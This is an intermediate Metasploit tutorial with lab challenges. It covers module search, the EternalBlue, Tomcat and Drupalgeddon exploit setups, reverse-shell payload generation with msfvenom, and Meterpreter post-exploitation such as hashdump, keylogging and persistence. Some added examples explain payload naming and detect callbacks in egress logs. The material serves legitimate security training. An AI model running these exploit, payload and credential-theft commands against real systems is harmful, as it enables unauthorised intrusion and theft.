Metasploit Framework Basics

Level: intermediate | 40 min | Writeup

Getting started with the most popular exploitation framework

Learning Objectives

  • Navigate Metasploit interface
  • Search and select exploits
  • Configure exploit options
  • Use payloads and handlers

If Nmap is the Swiss Army knife of network scanning, Metasploit is the entire toolbox, plus a robot that uses the tools for you. It's the world's most used penetration testing framework, containing thousands of exploits, payloads, and auxiliary modules.

Created by H.D. Moore in 2003 and now maintained by Rapid7, Metasploit transforms complex exploitation into a few simple commands. It's both loved (by pentesters) and feared (by defenders) because it makes attacking accessible to anyone.

Metasploit Editions

Metasploit Framework is free and open-source. Metasploit Pro is commercial with a GUI and extra features. We'll focus on the Framework - it's what you'll use in CTFs and most pentests.

Metasploit Architecture

  • Exploits: Code that takes advantage of vulnerabilities
  • Payloads: Code that runs after successful exploitation
  • Encoders: Obfuscate payloads to evade detection
  • Auxiliaries: Supporting modules (scanners, fuzzers, etc.)
  • Post: Post-exploitation modules
  • Nops: No-operation instructions for exploit stability

Think Like a Recipe

Exploit = the cooking technique, Payload = what you're making, Encoder = the secret ingredient that makes it undetectable. You need all three for a successful dish (compromise).

Getting Started

bash
# Start the database (first time)
sudo systemctl start postgresql
sudo msfdb init

# Start Metasploit console
msfconsole

# Update Metasploit
sudo apt update && sudo apt install metasploit-framework

Essential Commands

bash
# Help
help
?

# Search for modules
search ms17-010
search type:exploit platform:windows smb
search cve:2021-44228

# Use a module
use exploit/windows/smb/ms17_010_eternalblue

# Show module info
info
show options
show payloads
show targets

# Set options
set RHOSTS 192.168.1.10
set LHOST 192.168.1.5
set PAYLOAD windows/x64/meterpreter/reverse_tcp

# Run the exploit
exploit
run

# Background a session
background
sessions -l      # List sessions
sessions -i 1    # Interact with session 1

# Go back
back
exit

Understanding Payloads

Payload Types

  • Singles: Self-contained, one-shot payloads
  • Stagers: Small payloads that download the main payload
  • Stages: Downloaded by stagers, provides full functionality

bash
# Payload naming convention
windows / meterpreter / reverse_tcp
   |          |            |
platform    payload      stager

# Stageless (single) - Note the underscore
windows/meterpreter_reverse_tcp

# Staged - Note the slash
windows/meterpreter/reverse_tcp
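To make the naming rule concrete, here is an added example (not code from the original page) that decodes a payload name into platform, optional architecture, stage and stager, and reports whether it is staged (stage/stager), stageless (stage_stager), or a single with no stage component at all, which is what the cmd/* payloads listed below are. It generalises the rule above to names that carry an architecture component such as windows/x64/...; the stage-name list and the function names are assumptions made for this example.

```bash
#!/bin/sh
# Added example, not from the original page: decode a Metasploit payload name
# using the rule above (stage and stager joined by "/" = staged, by "_" =
# stageless). The stage-name list and the function names are assumptions
# made for this example.

# Stage names recognised. "meterpreter" and "shell" appear on the page;
# "vncinject" and "dllinject" are other stages Metasploit ships (assumption:
# this short list is enough for the payloads in this tutorial).
STAGE_NAMES="meterpreter shell vncinject dllinject"

# classify_payload NAME
# Prints: platform arch stage stager kind
#   kind = staged    (stage/stager, e.g. windows/x64/meterpreter/reverse_tcp)
#          stageless (stage_stager, e.g. windows/meterpreter_reverse_tcp)
#          single    (no stage component at all, e.g. cmd/unix/reverse_bash)
classify_payload() {
  cp_name=$1
  cp_arch=-; cp_stage=-; cp_stager=-; cp_kind=single
  cp_ifs=$IFS; IFS=/; set -- $cp_name; IFS=$cp_ifs
  cp_platform=$1
  # Optional architecture component right after the platform.
  case ${2:-} in
    x64|x86|aarch64|armle|mipsle|mipsbe|ppc|ppc64) cp_arch=$2 ;;
  esac
  # The last two components decide the kind.
  cp_prev=; cp_last=
  for cp_c in "$@"; do cp_prev=$cp_last; cp_last=$cp_c; done
  for cp_s in $STAGE_NAMES; do
    if [ "$cp_prev" = "$cp_s" ]; then
      # stage/stager: the small stager fetches the stage over the network
      cp_stage=$cp_s; cp_stager=$cp_last; cp_kind=staged; break
    elif [ "${cp_last#${cp_s}_}" != "$cp_last" ]; then
      # stage_stager: one self-contained payload, nothing fetched at run time
      cp_stage=$cp_s; cp_stager=${cp_last#${cp_s}_}; cp_kind=stageless; break
    fi
  done
  if [ "$cp_kind" = single ]; then cp_stager=$cp_last; fi
  printf '%s %s %s %s %s\n' "$cp_platform" "$cp_arch" "$cp_stage" "$cp_stager" "$cp_kind"
}

# payload_kind NAME -> only the kind, for use in scripts
payload_kind() { classify_payload "$1" | awk '{ print $NF }'; }

# Demo over payload names used in this tutorial.
for p in windows/x64/meterpreter/reverse_tcp windows/meterpreter_reverse_tcp \
         linux/x64/shell_reverse_tcp php/meterpreter/reverse_tcp cmd/unix/reverse_bash; do
  classify_payload "$p"
done
```

The practical reason to care: a staged payload needs the handler to serve the stage at connect time, so a stager that calls back to a handler configured with the stageless name (or vice versa) produces a connection that immediately dies; matching the `set PAYLOAD` line on the handler to the exact name given to msfvenom is the first thing to check when a session never appears.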

Common Payloads

bash
# Reverse shell (victim connects back to you)
windows/x64/meterpreter/reverse_tcp
linux/x64/meterpreter/reverse_tcp
cmd/unix/reverse_bash

# Bind shell (you connect to victim)
windows/x64/meterpreter/bind_tcp
linux/x64/shell/bind_tcp

# Simple command execution
cmd/windows/powershell_reverse_tcp
cmd/unix/reverse_python

Reverse vs Bind

Reverse: Victim connects to you (outbound connections are usually allowed through firewalls, so this is preferred)
Bind: You connect to victim (inbound connections to a new listening port are often blocked by firewalls)
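The same property that makes reverse shells convenient tells the defender where to look: the victim initiates the connection, so it shows up in egress logs. The following is an added example, not code from the original page, that runs a simple detection over a few constructed firewall log lines. It flags connections to port 4444, the LPORT this tutorial uses for its handler, and counts how many distinct hosts called back to the same listener, which is the fan-in pattern a multi-handler produces. The log format, the addresses and the function name are constructed for this example.

```bash
#!/bin/sh
# Added example (not from the original page): flag reverse-shell callbacks in
# egress logs. Port 4444 is the LPORT this tutorial uses for its handler; the
# log format, the addresses and the function name are constructed here.

# Ports worth a second look; extend with whatever your own tooling never uses.
DEFAULT_HANDLER_PORTS="4444"

# Constructed sample: key=value egress records from a perimeter firewall.
SAMPLE_LOG='2024-05-01T10:00:01Z src=192.168.1.10 dst=192.168.1.5 dport=4444 proto=tcp action=allow
2024-05-01T10:00:02Z src=192.168.1.10 dst=192.168.1.20 dport=443 proto=tcp action=allow
2024-05-01T10:00:03Z src=192.168.1.11 dst=192.168.1.5 dport=4444 proto=tcp action=allow
2024-05-01T10:00:04Z src=192.168.1.11 dst=192.168.1.5 dport=4444 proto=tcp action=allow
2024-05-01T10:00:05Z src=192.168.1.12 dst=192.168.1.5 dport=445 proto=tcp action=allow'

# flag_handler_callbacks < log
# Prints one line per listener, "dst:dport distinct_sources=N". Repeated
# connections from the same source count once; several distinct internal
# hosts reporting to one port on one host is the signal worth triaging.
flag_handler_callbacks() {
  awk -v ports="$DEFAULT_HANDLER_PORTS" '
    BEGIN { n = split(ports, p, " "); for (i = 1; i <= n; i++) watch[p[i]] = 1 }
    {
      split("", f)                       # clear the per-line field map
      for (i = 1; i <= NF; i++) { split($i, kv, "="); f[kv[1]] = kv[2] }
      if (!(f["dport"] in watch)) next
      key = f["dst"] ":" f["dport"]
      if (!((key, f["src"]) in seen)) { seen[key, f["src"]] = 1; count[key]++ }
    }
    END { for (k in count) printf "%s distinct_sources=%d\n", k, count[k] }
  ' | sort
}

# Demo over the constructed sample.
printf '%s\n' "$SAMPLE_LOG" | flag_handler_callbacks
```

The port is one `set LPORT` away from changing, so treat a hit as cheap triage input rather than a control. What does not change is that the compromised host opens the connection, which is why egress filtering and correlating each outbound connection with the process that made it on the endpoint are the durable defences.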

Meterpreter

Meterpreter is Metasploit's advanced payload. It runs entirely in memory (no files on disk), has encrypted communications, and provides powerful post-exploitation capabilities.

bash
# System info
meterpreter > sysinfo
meterpreter > getuid
meterpreter > getpid

# File system
meterpreter > pwd
meterpreter > ls
meterpreter > cd C:\Users
meterpreter > download secret.txt
meterpreter > upload malware.exe
meterpreter > cat file.txt

# Process management
meterpreter > ps
meterpreter > migrate 1234    # Migrate to process ID
meterpreter > kill 1234

# Networking
meterpreter > ipconfig
meterpreter > route
meterpreter > portfwd add -l 8080 -p 80 -r 10.0.0.1

# Privilege escalation
meterpreter > getsystem
meterpreter > hashdump

# Screenshots and keylogging
meterpreter > screenshot
meterpreter > keyscan_start
meterpreter > keyscan_dump

# Shell access
meterpreter > shell    # Drop to system shell
meterpreter > execute -f cmd.exe -i -H

# Persistence
meterpreter > run persistence -h

Migrate for Stability

After getting a Meterpreter session, migrate to a stable process like explorer.exe or svchost.exe. If the original exploited process crashes, you keep your access.

Listeners and Handlers

bash
# Set up a multi-handler (listener)
use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.5
set LPORT 4444
exploit -j    # Run in background

# Generate standalone payload
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=4444 -f exe > shell.exe

# Payload formats
msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f exe > shell.exe
msfvenom -p linux/x64/shell_reverse_tcp LHOST=IP LPORT=PORT -f elf > shell.elf
msfvenom -p php/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f raw > shell.php
msfvenom -p windows/shell_reverse_tcp LHOST=IP LPORT=PORT -f asp > shell.asp

Auxiliary Modules

Auxiliary modules do everything that isn't direct exploitation: scanning, brute forcing, sniffing, and more.

bash
# SMB scanning
use auxiliary/scanner/smb/smb_version
set RHOSTS 192.168.1.0/24
run

# Password brute forcing
use auxiliary/scanner/ssh/ssh_login
set RHOSTS 192.168.1.10
set USERNAME admin
set PASS_FILE /usr/share/wordlists/rockyou.txt
run

# Web directory scanner
use auxiliary/scanner/http/dir_scanner
set RHOSTS 192.168.1.10
run

# Port scanner
use auxiliary/scanner/portscan/tcp
set RHOSTS 192.168.1.0/24
set PORTS 22,80,443,445,3389
run

Common Exploits

EternalBlue (MS17-010)

bash
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.1.10
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.5
exploit

Tomcat Manager Upload

bash
use exploit/multi/http/tomcat_mgr_upload
set RHOSTS 192.168.1.10
set RPORT 8080
set HttpUsername admin
set HttpPassword admin
exploit

Drupalgeddon

bash
use exploit/unix/webapp/drupal_drupalgeddon2
set RHOSTS 192.168.1.10
exploit

Know What You're Running

Always read module documentation with "info" before running exploits. Some exploits crash services, cause data loss, or are unreliable.

Using the Database

bash
# Check database status
db_status

# Create workspace
workspace -a project_name
workspace project_name

# Import Nmap scan
db_import /path/to/nmap_scan.xml

# View data
hosts
services
vulns
creds

# Search services
services -p 445
services -S open

# Auto-exploit based on scan
# db_autopwn (deprecated)
# Instead, use analyze
analyze

Metasploit Methodology

Metasploit Exploitation Flow

  1. Recon: Import or run scans to identify targets
  2. Search: Find relevant exploits for discovered services
  3. Configure: Set RHOSTS, LHOST, payload options
  4. Validate: Use "check" command if available
  5. Exploit: Run the exploit
  6. Stabilize: Migrate meterpreter to stable process
  7. Post-Exploit: Run post modules, gather data
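The database commands above and the first four steps of this flow (recon, search, configure, validate) are exactly the kind of repeatable sequence msfconsole resource scripts exist for. Here is an added example, not code from the original page, of a shell function that writes such a script and deliberately stops at "check", so that the decision to type "exploit" stays with the operator after reading the result. Workspace name, scan path, module and addresses are parameters; the values in the demo call at the bottom are the lab values this tutorial uses, and the function name is an assumption.

```bash
#!/bin/sh
# Added example (not from the original page): write an msfconsole resource
# script that walks recon, search, configure and validate, then stops at
# "check". Resource scripts are plain files of console commands; lines that
# start with "#" are comments. Parameter names and the demo values below are
# constructed for this example.

# write_check_rc WORKSPACE NMAP_XML MODULE RHOSTS LHOST  > file.rc
write_check_rc() {
  ws=$1; xml=$2; mod=$3; rhosts=$4; lhost=$5
  cat <<EOF
# 1. Recon: keep this engagement's data in its own workspace and import the scan
workspace -a $ws
workspace $ws
db_import $xml
hosts
# 2. Search: what did the scan find, and which modules match it?
services -p 445
search type:exploit platform:windows smb
# 3. Configure
use $mod
set RHOSTS $rhosts
set LHOST $lhost
show options
# 4. Validate: read the output of check before deciding whether to run exploit
check
EOF
}

# Demo: generate the script for the lab values used in this tutorial.
write_check_rc lab /path/to/nmap_scan.xml \
  exploit/windows/smb/ms17_010_eternalblue 192.168.1.10 192.168.1.5
```

Redirect the output to a file and load it with `msfconsole -q -r validate.rc`; the console stays open at the prompt after the last line, with the module still selected, so the next command is yours. Because the script ends at step 4, it is safe to rerun while you refine RHOSTS or the module choice, which is the point of separating validation from exploitation in the flow above.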

Knowledge Check

Quick Quiz

What is the difference between a staged and stageless payload?

Challenges

Your First Exploit

Challenge (beginner)

Find a vulnerable Windows machine running SMB, exploit it with EternalBlue, and retrieve the flag from C:\flag.txt


Create a Payload

Challenge (intermediate)

Generate an executable payload with msfvenom, set up a handler, and get a meterpreter session when the payload is executed.


Key Takeaways

  • Metasploit Framework is free and contains thousands of exploits
  • Exploits + Payloads + Handlers = successful compromise
  • Meterpreter is the preferred payload - runs in memory
  • Reverse shells are preferred over bind shells for firewall bypass
  • Always migrate meterpreter to a stable process
  • Use auxiliary modules for scanning and brute forcing
  • The database feature integrates Nmap scans for organization